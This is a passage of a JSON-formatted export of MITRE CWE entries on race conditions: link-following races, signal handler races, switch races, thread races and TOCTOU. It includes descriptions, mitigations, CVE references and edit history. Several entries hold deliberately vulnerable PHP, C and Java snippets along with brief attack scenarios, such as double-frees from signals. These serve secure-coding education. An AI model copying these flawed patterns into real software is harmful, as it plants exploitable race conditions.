causing the software to access the wrong file.","Extended_Description":"While developers might expect that there is a very narrow time window between the time of check and time of use, there is still a race condition. An attacker could cause the software to slow down (e.g. with memory consumption), causing the time window to become larger. Alternately, in some situations, the attacker could win the race by performing a large number of attacks.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"367","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"59","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-49"},"Intro_Text":"This code prints the contents of a file if a user has permission.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function readFile($filename){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"$user = getCurrentUser();if(is_link($filename)){}if(fileowner($filename) == $user){}else{}","xhtml:br":["","","","","",""],"xhtml:i":"//resolve file if its a symbolic link","xhtml:div":[{"#text":"$filename = readlink($filename);","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo file_get_contents($realFile);return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"echo \'Access denied\';return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"This code attempts to resolve symbolic links before checking the file and printing its contents. However, an attacker may be able to change the file from a real file to a symbolic link between the calls to is_link() and file_get_contents(), allowing the reading of arbitrary files. Note that this code fails to log the attempted access (CWE-778)."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Race condition enabling link following"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS35-C","Entry_Name":"Avoid race conditions while checking for the existence of a symbolic link","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP20","Entry_Name":"Race Condition Window"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"26"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Race Conditions&#34;, Page 526"}}},"Notes":{"Note":{"#text":"This is already covered by the \\"Link Following\\" weakness (CWE-59). It is included here because so many people associate race conditions with link problems; however, not all link following issues involve race conditions.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"364":{"attr":{"@_ID":"364","@_Name":"Signal Handler Race Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a signal handler that introduces a race condition.","Extended_Description":{"xhtml:p":["Race conditions frequently occur in signal handlers, since signal handlers support asynchronous actions. These race conditions have a variety of root causes and symptoms. Attackers may be able to exploit a signal handler race condition to cause the software state to be corrupted, possibly leading to a denial of service or even code execution.","These issues occur when non-reentrant functions, or state-sensitive actions occur in the signal handler, where they may be called at any time. These behaviors can violate assumptions being made by the \\"regular\\" code that is interrupted, or by other signal handlers that may also be invoked. If these functions are called at an inopportune moment - such as while a non-reentrant function is already running - memory corruption could occur that may be exploitable for code execution. Another signal race condition commonly found occurs when free is called within a signal handler, resulting in a double free and therefore a write-what-where condition. Even if a given pointer is set to NULL after it has been freed, a race condition still exists between the time the memory was freed and the pointer was set to NULL. This is especially problematic if the same signal handler has been set for more than one signal -- since it means that the signal handler itself may be reentered.","There are several known behaviors related to signal handlers that have received the label of \\"signal handler race condition\\":","Signal handler vulnerabilities are often classified based on the absence of a specific protection mechanism, although this style of classification is discouraged in CWE because programmers often have a choice of several different mechanisms for addressing the weakness. Such protection mechanisms may preserve exclusivity of access to the shared resource, and behavioral atomicity for the relevant code:"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Shared state (e.g. global data or static variables) that are accessible to both a signal handler and \\"regular\\" code","Shared state between a signal handler and other signal handlers","Use of non-reentrant functionality within a signal handler - which generally implies that shared state is being used. For example, malloc() and free() are non-reentrant because they may use global or static data structures for managing memory, and they are indirectly used by innocent-seeming functions such as syslog(); these functions could be exploited for memory corruption and, possibly, code execution.","Association of the same signal handler function with multiple signals - which might imply shared state, since the same code and resources are accessed. For example, this can be a source of double-free and use-after-free weaknesses.","Use of setjmp and longjmp, or other mechanisms that prevent a signal handler from returning control back to the original functionality","While not technically a race condition, some signal handlers are designed to be called at most once, and being called more than once can introduce security problems, even when there are not any concurrent calls to the signal handler. This can be a source of double-free and use-after-free weaknesses."]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Avoiding shared state","Using synchronization in the signal handler","Using synchronization in the regular code","Disabling or masking other signals, which provides atomicity (which effectively ensures exclusivity)"]}}]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"415","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"416","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"123","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Application Data","Modify Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"],"Note":"It may be possible to cause data corruption and possibly execute arbitrary code by modifying global variables or data structures at unexpected times, violating the assumptions of code that uses this global data."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If a signal handler interrupts code that is executing with privileges, it may be possible that the signal handler will also be executed with elevated privileges, possibly making subsequent exploits more severe."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":"Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid."},{"Phase":"Architecture and Design","Description":"Design signal handlers to only set flags, rather than perform complex functionality. These flags can then be checked and acted upon within the main program loop."},{"Phase":"Implementation","Description":"Only use reentrant functions within signal handlers. Also, use validation to ensure that state is consistent while performing asynchronous actions that affect the state of execution."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-26"},"Intro_Text":"This code registers the same signal handler function with two different signals (CWE-831). If those signals are sent to the process, the handler creates a log message (specified in the first argument to the program) and exits.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *logMessage;void handler (int sigNum) {}int main (int argc, char* argv[]) {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"syslog(LOG_NOTICE, \\"%s\\\\n\\", logMessage);free(logMessage);sleep(10);exit(0);","xhtml:br":["","","","",""],"xhtml:i":"/* artificially increase the size of the timing window to make demonstration of this weakness easier. */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"logMessage = strdup(argv[1]);signal(SIGHUP, handler);signal(SIGTERM, handler);sleep(10);","xhtml:br":["","","","","","",""],"xhtml:i":["/* Register signal handlers. */","/* artificially increase the size of the timing window to make demonstration of this weakness easier. */"]}}]}},"Body_Text":["The handler function uses global state (globalVar and logMessage), and it can be called by both the SIGHUP and SIGTERM signals. An attack scenario might follow these lines:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"The program begins execution, initializes logMessage, and registers the signal handlers for SIGHUP and SIGTERM."},{"xhtml:div":"The program begins its \\"normal\\" functionality, which is simplified as sleep(), but could be any functionality that consumes some time."},{"xhtml:div":"The attacker sends SIGHUP, which invokes handler (call this \\"SIGHUP-handler\\")."},{"xhtml:div":"SIGHUP-handler begins to execute, calling syslog()."},{"xhtml:div":"syslog() calls malloc(), which is non-reentrant. malloc() begins to modify metadata to manage the heap."},{"xhtml:div":"The attacker then sends SIGTERM."},{"xhtml:div":"SIGHUP-handler is interrupted, but syslog\'s malloc call is still executing and has not finished modifying its metadata."},{"xhtml:div":"The SIGTERM handler is invoked."},{"xhtml:div":"SIGTERM-handler records the log message using syslog(), then frees the logMessage variable."}]}},"At this point, the state of the heap is uncertain, because malloc is still modifying the metadata for the heap; the metadata might be in an inconsistent state. The SIGTERM-handler call to free() is assuming that the metadata is inconsistent, possibly causing it to write data to the wrong location while managing the heap. The result is memory corruption, which could lead to a crash or even code execution, depending on the circumstances under which the code is running.","Note that this is an adaptation of a classic example as originally presented by Michal Zalewski [REF-360]; the original example was shown to be exploitable for code execution.","Also note that the strdup(argv[1]) call contains a potential buffer over-read (CWE-126) if the program is called without any arguments, because argc would be 0, and argv[1] would point outside the bounds of the array."]},{"attr":{"@_Demonstrative_Example_ID":"DX-48"},"Intro_Text":"The following code registers a signal handler with multiple signals in order to log when a specific event occurs and to free associated memory before exiting.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;signal.h&gt;#include &lt;syslog.h&gt;#include &lt;string.h&gt;#include &lt;stdlib.h&gt;void *global1, *global2;char *what;void sh (int dummy) {}int main (int argc,char* argv[]) {}","xhtml:br":["","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"syslog(LOG_NOTICE,\\"%s\\\\n\\",what);free(global2);free(global1);sleep(10);exit(0);","xhtml:br":["","","","","",""],"xhtml:i":"/* Sleep statements added to expand timing window for race condition */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"what=argv[1];global1=strdup(argv[2]);global2=malloc(340);signal(SIGHUP,sh);signal(SIGTERM,sh);sleep(10);exit(0);","xhtml:br":["","","","","","","",""],"xhtml:i":"/* Sleep statements added to expand timing window for race condition */"}}]}},"Body_Text":["However, the following sequence of events may result in a double-free (CWE-415):",{"xhtml:ol":{"xhtml:li":[{"xhtml:div":"a SIGHUP is delivered to the process"},{"xhtml:div":"sh() is invoked to process the SIGHUP"},{"xhtml:div":"This first invocation of sh() reaches the point where global1 is freed"},{"xhtml:div":"At this point, a SIGTERM is sent to the process"},{"xhtml:div":"the second invocation of sh() might do another free of global1"},{"xhtml:div":"this results in a double-free (CWE-415)"}]}},"This is just one possible exploitation of the above code. As another example, the syslog call may use malloc calls which are not async-signal safe. This could cause corruption of the heap management structures. For more details, consult the example within \\"Delivering Signals for Fun and Profit\\" [REF-360]."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0035","Description":"Signal handler does not disable other signal handlers, allowing it to be interrupted, causing other functionality to access files/etc. with raised privileges","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0035"},{"Reference":"CVE-2001-0905","Description":"Attacker can send a signal while another signal handler is already running, leading to crash or execution with root privileges","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0905"},{"Reference":"CVE-2001-1349","Description":"unsafe calls to library functions from signal handler","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1349"},{"Reference":"CVE-2004-0794","Description":"SIGURG can be used to remotely interrupt signal handler; other variants exist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0794"},{"Reference":"CVE-2004-2259","Description":"SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2259"}]},"Functional_Areas":{"Functional_Area":["Signals","Interprocess Communication"]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Signal handler race condition"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Signal Handling Race Conditions"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Race condition in signal handler"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-360"}},{"attr":{"@_External_Reference_ID":"REF-361"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 13: Race Conditions.&#34; Page 205"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 13, &#34;Signal Vulnerabilities&#34;, Page 791"}}]},"Notes":{"Note":{"#text":"Probably under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}]}},"365":{"attr":{"@_ID":"365","@_Name":"Race Condition in Switch","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code contains a switch statement in which the switched variable can be modified while the switch is still executing, resulting in unexpected behavior.","Extended_Description":"This issue is particularly important in the case of switch statements that involve fall-through style case statements - i.e., those which do not end with break. If the variable being tested by the switch changes in the course of execution, this could change the intended logic of the switch so much that it places the process in a contradictory state and in some cases could even result in memory corruption.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"367","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"364","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"366","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Alter Execution Logic","Unexpected State"],"Note":"This weakness may lead to unexpected system state, resulting in unpredictable behavior."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Variables that may be subject to race conditions should be locked before the switch statement starts and only unlocked after the statement ends."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example has a switch statement that executes different code depending on the current time.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;sys/types.h&gt;#include &lt;sys/stat.h&gt;int main(argc,argv){}","xhtml:br":["",""],"xhtml:div":{"#text":"struct stat *sb;time_t timer;lstat(\\"bar.sh\\",sb);printf(\\"%d\\\\n\\",sb-&gt;st_ctime);switch(sb-&gt;st_ctime % 2){}return 0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""],"xhtml:div":{"#text":"case 0: printf(\\"One option\\\\n\\");break;case 1: printf(\\"another option\\\\n\\");break;default: printf(\\"huh\\\\n\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}}},"Body_Text":"It seems that the default case of the switch statement should never be reached, as st_ctime % 2 should always be 0 or 1. However, if st_ctime % 2 is 1 when the first case is evaluated, the time may change and st_ctime % 2 may be equal to 0 when the second case is evaluated. The result is that neither case 1 or case 2 execute, and the default option is chosen."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Race condition in switch"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 13: Race Conditions.&#34; Page 205"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, References, Relationships"}]}},"366":{"attr":{"@_ID":"366","@_Name":"Race Condition within a Thread","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"If two threads of execution use a resource simultaneously, there exists the possibility that resources may be used while invalid, in turn making the state of execution undefined.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Alter Execution Logic","Unexpected State"],"Note":"The main problem is that -- if a lock is overcome -- data could be altered in a bad state."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use locking functionality. This is the recommended solution. Implement some form of locking mechanism around code which alters or reads persistent data in a multithreaded environment."},{"Phase":"Architecture and Design","Description":"Create resource-locking validation checks. If no inherent locking mechanisms exist, use flags and signals to enforce your own blocking scheme when resources are being used by other threads of execution."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int foo = 0;int storenum(int num) {}","xhtml:br":"","xhtml:div":{"#text":"static int counter = 0;counter++;if (num &gt; foo) foo = num;return foo;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public classRace {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"static int foo = 0;public static void main() {}public static class Threader extends Thread {}","xhtml:br":["",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"new Threader().start();foo = 1;","xhtml:br":["",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public void run() {}","xhtml:br":"","xhtml:div":{"#text":"System.out.println(foo);","attr":{"@_style":"margin-left:10px;"}}}}]}}}}]}},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Race condition within a thread"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON32-C","Entry_Name":"Prevent data races when accessing bit-fields from multiple threads","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON40-C","Entry_Name":"Do not refer to an atomic variable twice in an expression","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON43-C","Entry_Name":"Do not allow data races in multithreaded code","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA02-J","Entry_Name":"Ensure that compound operations on shared variables are atomic"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA03-J","Entry_Name":"Do not assume that a group of calls to independently atomic methods is atomic"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"29"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 13: Race Conditions.&#34; Page 205"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 13, &#34;Race Conditions&#34;, Page 759"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}]}},"367":{"attr":{"@_ID":"367","@_Name":"Time-of-check Time-of-use (TOCTOU) Race Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software checks the state of a resource before using that resource, but the resource\'s state can change between the check and the use in a way that invalidates the results of the check. This can cause the software to perform invalid actions when the resource is in an unexpected state.","Extended_Description":"This weakness can be security-relevant when an attacker can influence the state of the resource between check and use. This can happen with shared resources such as files, memory, or even variables in multithreaded programs.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"TOCTTOU","Description":"The TOCTTOU acronym expands to \\"Time Of Check To Time Of Use\\"."},{"Term":"TOCCTOU","Description":"The TOCCTOU acronym is most likely a typo of TOCTTOU, but it has been used in some influential documents, so the typo is repeated fairly frequently."}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Other"],"Impact":["Alter Execution Logic","Unexpected State"],"Note":"The attacker can gain access to otherwise unauthorized 